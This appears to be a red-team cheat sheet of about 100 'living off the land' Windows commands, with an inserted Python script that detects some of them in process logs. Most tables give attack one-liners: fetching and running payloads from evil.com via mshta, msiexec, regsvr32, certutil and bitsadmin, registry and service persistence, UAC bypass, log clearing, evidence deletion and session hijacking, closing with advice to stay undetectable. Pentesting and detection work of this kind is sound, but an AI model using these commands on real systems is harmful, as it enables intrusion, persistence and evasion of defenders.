Introduction 
Living off the land (LotL) in Windows leverages built-in tools to execute attacks, persist, and evade detection. This cheat sheet compiles 100 native commands for red teamers and pentesters.
 
Why LotL Matters 
LotL avoids external binaries, dodging antivirus and blending into normal system activity.
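Because these commands run signed system binaries, detection usually keys on command-line arguments in process-creation logs rather than on the binary itself. The sketch below is an added example, not part of the original cheat sheet: it matches constructed sample events against argument patterns taken from commands listed on this page. The rule names, event field names and the example.test host are assumptions.

```python
import ntpath
import re

URL = r"https?://"
# (rule name, binary, argument pattern), built from commands in this cheat sheet.
# The binary alone is normal system activity; the arguments carry the signal.
RULES = [
    ("mshta_remote_hta",    "mshta",      URL),
    ("regsvr32_remote_sct", "regsvr32",   r"[-/]i:" + URL + r".*scrobj\.dll"),
    ("msiexec_remote_msi",  "msiexec",    r'[-/]i\s+"?' + URL),
    ("certutil_download",   "certutil",   URL),
    ("certutil_decode",     "certutil",   r"\s[-/]decode\s"),
    ("bitsadmin_transfer",  "bitsadmin",  r"\s/transfer\s"),
    # PowerShell accepts abbreviated forms of -EncodedCommand (-e, -ec, -enc, ...).
    ("powershell_encoded",  "powershell", r"\s[-/]e(?:c|n|nc[a-z]*)?\s"),
    ("wevtutil_clear_log",  "wevtutil",   r"\s(?:cl|clear-log)\s+\S"),
]

def binary_name(image):
    """Normalise a process image path: drop directory, quotes, case and '.exe'."""
    name = ntpath.basename(image.strip('"')).lower()
    return name[:-4] if name.endswith(".exe") else name

def match_rules(event):
    """Return the names of all rules that fire for one process-creation event."""
    name = binary_name(event["image"])
    return [rule for rule, binary, pattern in RULES
            if name == binary and re.search(pattern, event["command_line"], re.I)]

# Constructed sample events, shaped like process-creation records
# (Sysmon Event ID 1 / Security 4688 with command-line auditing enabled).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe", "command_line": "mshta http://example.test/mal.hta"},
    {"image": r"C:\Windows\System32\certutil.exe", "command_line": r"certutil -hashfile C:\temp\setup.exe SHA256"},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe", "command_line": "REGSVR32 /s /u /i:HTTP://example.test/script.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "powershell.exe -NoP -EncodedCommand AAAA"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": r"powershell -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\wevtutil.exe", "command_line": "wevtutil cl System"},
    {"image": r"C:\Windows\System32\msiexec.exe", "command_line": r"msiexec /i C:\installers\app.msi /qn"},
    {"image": r"C:\Windows\System32\certutil.exe", "command_line": "certutil -urlfetch -f http://example.test/file.exe file.exe"},
]

def scan(events):
    """Map event index -> list of rule names, for events with at least one hit."""
    return {i: m for i, e in enumerate(events) if (m := match_rules(e))}

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(SAMPLE_EVENTS[i]["command_line"], "->", ", ".join(hits))
```

The benign certutil, msiexec and PowerShell invocations in the sample produce no hits, which is the point of matching on arguments instead of alerting on every launch of the binary.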
LotL Techniques 
Execution 
| Command | Usage |
| --- | --- |
| powershell -c <command> | Execute PowerShell commands |
| cmd /c <command> | Run basic shell commands |
| mshta http://evil.com/mal.hta | Execute HTA files |
| rundll32.exe evil.dll,EntryPoint | Load malicious DLLs |
| msiexec /q /i http://evil.com/payload.msi | Install payloads silently |
| wmic process call create "cmd.exe /c evil.exe" | Spawn processes via WMI |
| forfiles /p c:\ /c "cmd /c evil.exe" | Loop execution |
| pcalua -a evil.exe | Escalate via program compatibility |
| regsvr32 /s /u /i:http://evil.com/script.sct scrobj.dll | Run scripts via DLL |
| cmstp /ni /s evil.inf | Execute INF files |
| wscript script.vbs | Run VBScripts |
| cscript script.vbs | Run scripts silently |
| start cmd /c evil.exe | Launch in new window |
| runas /user:hacker cmd.exe | Use alternate credentials |
| wusa evil.msu /quiet | Install updates with payloads |
 
Persistence 
| Command | Usage |
| --- | --- |
| schtasks /create /tn "Task" /tr "cmd.exe" /sc daily | Schedule daily tasks |
| reg add HKCU\Software\Run /v Evil /t REG_SZ /d "cmd.exe" | Add to startup |
| sc create EvilService binpath= "cmd.exe /c evil.exe" | Create persistent service |
| at 12:00 cmd.exe /c evil.exe | Legacy task scheduling |
| mofcomp evil.mof | Persist via WMI |
| assoc .txt=evil.exe | Hijack file associations |
| ftype txtfile=evil.exe "%1" | Link file types to payloads |
| bcdedit /set {default} safeboot network | Alter boot config |
 
Privilege Escalation / UAC Bypass 
| Command | Usage |
| --- | --- |
| eventvwr | Bypass UAC via registry |
| fodhelper | Elevate silently |
| sdclt /kickoffelev | Trigger elevated process |
 
File Download / Transfer 
| Command | Usage |
| --- | --- |
| bitsadmin /transfer job /download /priority normal http://evil.com/file.exe C:\file.exe | Download files |
| certutil -urlfetch -f http://evil.com/file.exe file.exe | Fetch files |
| IWR -Uri http://evil.com/file -OutFile file.exe | PowerShell download |
| certutil -decode encoded.txt decoded.exe | Decode base64 files |
 
Reconnaissance 
| Command | Usage |
| --- | --- |
| wmic process list | List processes |
| net user /add hacker password | Create users |
| netstat -ano | Show network connections |
| ipconfig /all | Display network config |
| whoami /all | Check user privileges |
| systeminfo | Get system details |
| tasklist /v | List processes with details |
| dir /s /b c:\ > files.txt | Enumerate files |
| findstr /si password *.txt | Search for creds |
| type secret.txt | Read file contents |
| arp -a | Local network info |
| route print | View routing table |
| nbtstat -A 192.168.1.1 | NetBIOS recon |
| driverquery | List drivers |
| fsutil fsinfo drives | List drives |
| gpresult /r | Show group policy |
| netdom query dc | Domain controller info |
| nltest /dsgetdc:domain | Domain trust details |
| dsquery * -limit 0 | Query AD objects |
| query user | List user sessions |
 
Network Operations 
| Command | Usage |
| --- | --- |
| netsh interface portproxy add v4tov4 listenport=80 connectport=8080 connectaddress=127.0.0.1 | Port forwarding |
| ping -n 10 192.168.1.1 | Test connectivity |
| tracert 8.8.8.8 | Trace network path |
| pathping 8.8.8.8 | Analyze latency |
| mstsc /v:192.168.1.1 | Remote desktop |
 
File System Operations 
| Command | Usage |
| --- | --- |
| copy evil.exe c:\windows\temp | Copy files |
| move evil.exe c:\windows\system32 | Move files |
| del evidence.txt | Delete files |
| echo PAYLOAD > evil.bat | Create files |
| attrib +h evil.exe | Hide files |
| icacls file.exe /grant hacker:f | Modify permissions |
| takeown /f file.exe | Take ownership |
| net share evil=c:\evil /grant:hacker,full | Share files |
| mkdir c:\hidden | Create directories |
| rmdir /s /q c:\evidence | Remove directories |
| ren evil.exe legit.exe | Rename files |
| xcopy evil.exe c:\windows /h /c | Copy with attributes |
| robocopy c:\source c:\dest evil.exe /mir | Mirror directories |
| replace evil.exe c:\windows /u | Replace files |
| expand evil.cab -F:* c:\dest | Extract CAB files |
| makecab evil.exe evil.cab | Compress to CAB |
| extrac32 evil.cab | Extract files |
 
Evasion / Defense Evasion 
| Command | Usage |
| --- | --- |
| powershell -enc <base64> | Encode payloads |
| wevtutil cl System | Clear logs |
| eventcreate /t ERROR /id 100 /l APPLICATION /d "Fake" | Create fake logs |
| powercfg /hibernate off | Disable hibernate logs |
| subst z: c:\evil | Map drives for obfuscation |
 
System Control 
| Command | Usage |
| --- | --- |
| taskkill /im process.exe /f | Kill processes |
| shutdown /r /t 0 | Reboot system |
| diskpart | Manage disks |
| chkdsk c: /f | Check disk |
| sfc /scannow | Scan system files |
| syskey | Enable SAM encryption |
| vssadmin create shadow /for=c: | Create shadow copies |
 
Data Manipulation 
| Command | Usage |
| --- | --- |
| comp file1 file2 | Compare files |
| fc file1 file2 | Compare file differences |
| sort < input.txt > output.txt | Sort data |
| cipher /e file.txt | Encrypt files |
 
Session Management 
| Command | Usage |
| --- | --- |
| qwinsta | List sessions |
| rwinsta 1 | Reset session |
| tscon 1 /dest:console | Hijack session |
| tskill processname | Kill tasks |
| logoff 1 | End session |
 
Miscellaneous 
| Command | Usage |
| --- | --- |
| auditpol /set /category:"Logon" /success:enable | Set audit policy |
| secedit /export /cfg config.txt | Export security config |
| psr /start /output record.zip /sc 1 | Record screen |
| explorer c:\evil | Open explorer |
| control | Launch control panel |
| msg * "Warning" | Send messages |
| set PATH=%PATH%;C:\evil | Modify PATH |
 
Pro Tips 
Combine powershell -enc with cmd /c for stealth. 
Use whoami /all to confirm privileges. 
Test in a sandbox—some commands disrupt live systems. 
 
Conclusion 
This LotL cheat sheet arms you with 100 Windows-native techniques. Master them to stay undetectable. Follow @Squid_Sec on X for more cyber hacks.